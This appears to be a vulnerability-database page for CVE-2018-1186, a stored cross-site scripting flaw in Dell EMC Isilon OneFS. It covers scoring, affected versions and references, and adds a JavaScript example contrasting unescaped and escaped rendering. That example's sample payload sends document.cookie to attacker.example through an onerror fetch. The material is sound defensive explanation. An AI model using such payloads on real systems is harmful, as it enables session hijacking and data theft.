CVE-2018-1186
Published 2018-03-26
Priority: P4 · 24 · medium · 4.8 (CVSS 3.0)
Vector: AV:N / AC:L / PR:H / UI:R / S:C / C:L / I:L / A:N
Exploit: EPSS 1.86% (76.6th percentile)
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 are affected by a cross-site scripting vulnerability in the Cluster description of the OneFS web administration interface. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website.
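To make the CWE-79 pattern behind this entry concrete, here is an added illustration, written for this page and not taken from OneFS or any Dell code: a stored cluster description is rendered once as raw markup (the vulnerable shape) and once through output encoding (the hardened shape), with an audit helper that flags a stored value that would be interpreted as markup. The field name, the rendering functions and the payload are all constructed assumptions for the example.

```javascript
// Added illustration (not OneFS code): a stored cluster description rendered
// as raw HTML versus rendered through output encoding. Field name, helpers
// and payload are assumptions constructed for this example.

// Constructed attacker-controlled value, of the kind a malicious administrator
// could save in a free-text "description" field.
const MALICIOUS_DESCRIPTION =
  'Prod cluster "east"<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable pattern: the stored value is concatenated straight into markup,
// so any tags or event handlers in it are interpreted by the viewer's browser.
function renderVulnerable(description) {
  return '<div class="cluster-description">' + description + '</div>';
}

// HTML-escape the characters that switch parsing context in text and
// attribute-value positions. & must be replaced first (it is, via one pass).
function escapeHtml(value) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  };
  return String(value).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Hardened pattern: the same markup shell, but the untrusted value is encoded
// so the browser shows it as text instead of executing it.
function renderHardened(description) {
  return '<div class="cluster-description">' + escapeHtml(description) + '</div>';
}

// Audit helper: returns true when a stored description contains something a
// browser would treat as a tag, an inline event handler or a javascript: URL.
// Useful for checking whether a malicious description is already persisted.
function looksLikeMarkup(description) {
  return /<[a-z!\/?]/i.test(description)
    || /\bon\w+\s*=/i.test(description)
    || /javascript:/i.test(description);
}

function demo() {
  return {
    vulnerable: renderVulnerable(MALICIOUS_DESCRIPTION),
    hardened: renderHardened(MALICIOUS_DESCRIPTION),
    flagged: looksLikeMarkup(MALICIOUS_DESCRIPTION),
  };
}
```

In a real web interface the fix is to let the templating layer encode every interpolated value by default and never to assign administrator-supplied text to `innerHTML`; the escaper above only covers the HTML text and quoted-attribute contexts, so a value placed inside a `<script>` block or a URL needs its own encoder. Because the flaw needs an administrator to store the payload, the audit helper is the practical check on an existing deployment: run it over the current cluster description before assuming nobody has already planted one.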
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dell | emc_isilon | — | — |
| dell | emc_isilon | 7.2.1.0 – 7.2.1.6 | — |
| dell | emc_isilon | 8.0.0.0 – 8.0.0.6 | — |
| dell | emc_isilon | 8.0.1.0 – 8.0.1.2 | — |
| dell | emc_isilon | 8.1.0.0 – 8.1.0.1 | — |
| dell_emc | isilon_onefs | — | — |
Note that the description above also names version 7.1.1.11 and all of 7.2.1.x, while the indexed ranges stop at 7.2.1.6 and do not list 7.1.1.11; confirm exposure against the vendor advisory rather than against these ranges alone.
CVSS provenance
NVD v3.0: 4.8 MEDIUM — CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
NVD v2.0: 3.5 LOW — AV:N/AC:M/Au:S/C:N/I:P/A:N
GHSA
GHSA-2gw8-rmq5-c5gv (ghsa_unreviewed · 2022-05-14): CVE-2018-1186 [MEDIUM], CWE-79
Title as indexed: "Dell EMC Isilon versions between 8" (truncated)
The advisory text repeats the NVD description given above verbatim.
Jenkins
Jenkins Security Advisory 2018-10-29 (vendor_jenkins · 2018-10-29 · CVSS 8.8)
CVE-2018-1000865 [HIGH]
This advisory concerns the Jenkins tracker issue SECURITY-1186 and CVE-2018-1000865, a sandbox bypass in Jenkins plugins; it is unrelated to the Isilon OneFS cross-site scripting issue on this page and is associated with CVE-2018-1186 only through the shared number 1186.
This advisory announces vulnerabilities in the following Jenkins deliverables:
Pipeline: Groovy Plugin
Script Security Plugin
Descriptions
Sandbox Bypass in Script Security and Pipeline Groovy Plugins
SECURITY-1186 / CVE-2018-1000865 (Script Security Plugin) an
No detection rules found.
No writeups or analysis indexed.
References
http://seclists.org/fulldisclosure/2018/Mar/50
http://www.securityfocus.com/bid/103033
https://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities
https://www.exploit-db.com/exploits/44039/